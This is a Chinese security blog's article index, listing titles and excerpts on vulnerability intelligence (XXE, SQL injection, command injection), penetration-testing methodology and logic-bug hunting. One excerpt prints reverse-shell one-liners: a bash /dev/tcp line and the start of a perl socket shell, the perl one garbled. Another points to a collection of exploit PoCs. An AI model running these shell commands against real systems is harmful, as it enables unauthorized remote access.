- 博客(25)
- 资源 (4)
- 收藏
- 关注
RSS订阅原创 欢迎大家关注公众号-不秃头的安全
日常文章更新公众号优先,所以可能csdn平台更新不及时,希望大家关注支持一下微信公众号-不秃头的安全,增加一下粉丝量。
2024-01-17 13:04:07
374
原创 漏洞情报-x友NC-Cloud soapFor mat XXE漏洞
用友NC-Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现人、财、物、客的 全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。该系统/uapws/soapFormat.ajax接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,会导致服务器被远控。用友NC Cloud。
2024-01-11 10:04:03
667
原创 漏洞情报-世邦IP网络对讲广播系统远程命令执行漏洞CVE-2023-6895
海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE(HIK)中发现了漏洞。它被宣布为危急状态。此漏洞影响文件/php/ping. php的未知代码。使用输入netstat -ano操作参数jsondata[ip]会导致os命令注入。升级到4.1.0版本可以解决这个问题。建议升级受影响的组件。
2024-01-09 09:58:30
1115
原创 我的创作纪念日-不秃头的安全
希望我们能更深入学习,在专业上能学习更多知识,在工作上能更加提高,薪资翻倍,我是不秃头的安全的MY0723,我们会收获更多粉丝与支持,会分享更多有用的安全知识与渗透思路,在写文章的同时也能希望你们能喜欢支持,加油~从23年3月想法开始,我们团队小伙伴都在积极的贡献文章,发散思路,共同学习,虽然中间一段长时间断更,但是还好现在有了创作的动力,看到一个一个关注的粉丝心情每次都是不一样的激动。
2024-01-06 19:26:39
379
原创 随手挖洞|一次捡的逻辑漏洞 cnvd
如XX后台管理系统V2.0存在水平越权,由于应用系统中Id参数可控并未经校验导致信息被越权修改,攻击者可通过遍历Id参数批量更改其他用户数据及个人信息。
2024-01-06 19:00:02
1154
原创 漏洞情报-泛微云桥 e-Bridge addTaste接口SQL注入漏洞
由于泛微云桥e-Bridge平台addTaste接口存在SQL注入漏洞,未经身份认证的攻击者可以利用该漏洞获取数据库权限及数据库的敏感数据。3、其他内容不修改,然后放包后即可复现。
2024-01-02 15:40:35
702
原创 实战SRC|北京、上海等27省某x电力xx中心存在存储XSS漏洞
我们在日常挖洞过程中,会遇到需要填写一堆个人或企业信息的页面,大多数情况下我们都会嫌麻烦,怕填写了半天最后也没挖到洞,从而忽略这种网站。其实这种网站恰恰更有可能存在漏洞,因为大多数渗透人员都嫌麻烦继而放弃,导致这种看似很安全的网站,更有可能存在漏洞。
2023-04-07 17:04:34
2938
原创 浅谈漏洞思路分享-逻辑漏洞(支付系统篇)
渗透测试项目中网站哪里可能存在逻辑漏洞呢?这里总结了三大类关于登录页面、会员系统、支付系统可能出现的逻辑漏洞情况,参考之前hackctf公众号里总结的逻辑漏洞位置一张图提供思路,内容比较多所以分开来写,同时参考网上文章及个人案例进行了总结补充,希望大家多多关注。
2023-04-07 16:56:03
978
原创 浅谈漏洞思路分享-实战-水平越权
记一次外出渗透项目的水平越权漏洞记录分享,本人安全技术的一名小学生,仍在学习中,大佬有意见可指点,不喜勿喷,感谢指点!!!
2023-03-13 17:42:01
560
原创 浅谈漏洞思路分享-逻辑漏洞(登录页面篇)
安服渗透测试项目中网站哪里可能存在逻辑漏洞呢?这里总结了三大类关于登录页面、会员系统、支付系统共xx种漏洞情况,参考之前hackctf公众号里总结的逻辑漏洞位置一张图提供思路,内容比较多所以分开来写,同时参考网上文章及个人案例进行了总结补充,希望大家多多关注。
2023-03-13 17:32:40
1587
转载 常见网站漏洞checklist
文章来源:Wangfly博客原文地址:https://www.hui-blog.cool/posts/97ef.html前言在做网站渗透之前除了关注一些通用漏洞,这些漏洞通常能很容易的利用扫描器扫出,被WAF所防护,然而有一些逻辑漏洞WAF和扫描器就无法发现了,就需要人工来测试,根据各行业的特点总结了下网站的常见漏洞checklist互联网行业p2p 金融行业电商行业政府行业
2022-12-02 12:19:42
164
原创 Windows各种版本上传shell写法
#bash版本:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1#perl版本:perl -e ‘use Socket;i="10.0.0.1";i="10.0.0.1";i="10.0.0.1";p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in(p,inetaton(p,inet_aton(p,inetaton(i)))){o
2022-08-17 07:33:11
243
原创 渗透测试的基本流程
主要分为以下几步: 1. 明确目标 2. 信息收集 3. 漏洞探测(挖掘) 4. 漏洞验证(利用) 5. 提升权限 6. 清除痕迹 7. 事后信息分析 8. 编写渗透测试报告 1.1 明确目标 主要是确定需要渗透资产范围; 确定规则,如怎么去渗透; 确定需求,如客户需要达到一个什么样的效果。 1.2 信息收集 信息收集阶段主要是收集一些基础信息,系统信息,应用信息,版本信息,服务信息,人员信息以及相关防护信息。 信息收集大多是工具加手工进行收集信息,工
2022-08-12 21:35:20
137
原创 红队版goby-poc,包含447个自定义goby-poc
下载地址:https://github.com/MY0723/goby-poc下载有用的话给GitHub点个关注➕star谢谢喽!!包含439个自定义goby-poc,可能会有重复自行判断,来源于网络收集的Goby&POC,实时更新。如果无红队版,可直接poc管理处导入自定义poc即可,共计736个。本程序仅供于学习交流,请使用者遵守《中华人民共和国网络安全法》,勿将此脚本用于非授权的测试,脚本开发者不负任何连带法律责任。Goby POC 仅仅只供对已授权的目标使用测试,对未授权目标的测
2022-08-10 21:06:26
8554
2
原创 2021-03-18
标题记一次win10 联想Y7000更新驱动后蓝牙开关图标消失,且在设置中蓝牙开关也消失网上搜索各种禁用启动蓝牙服务,或设备管理器中串行总线控制器中未知USB设备重新启动都没用最后找到一个方法将所有连接电脑的所有线头或外设都拔掉,然后关机,关机后长按开机键20秒,此间为电脑释放静电操作,然后松开启动发现蓝牙开关键重回。同时也能连接蓝牙设备...
2021-03-18 13:18:24
78
红队版Goby-poc438个自定义goby-poc
2022-08-10
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人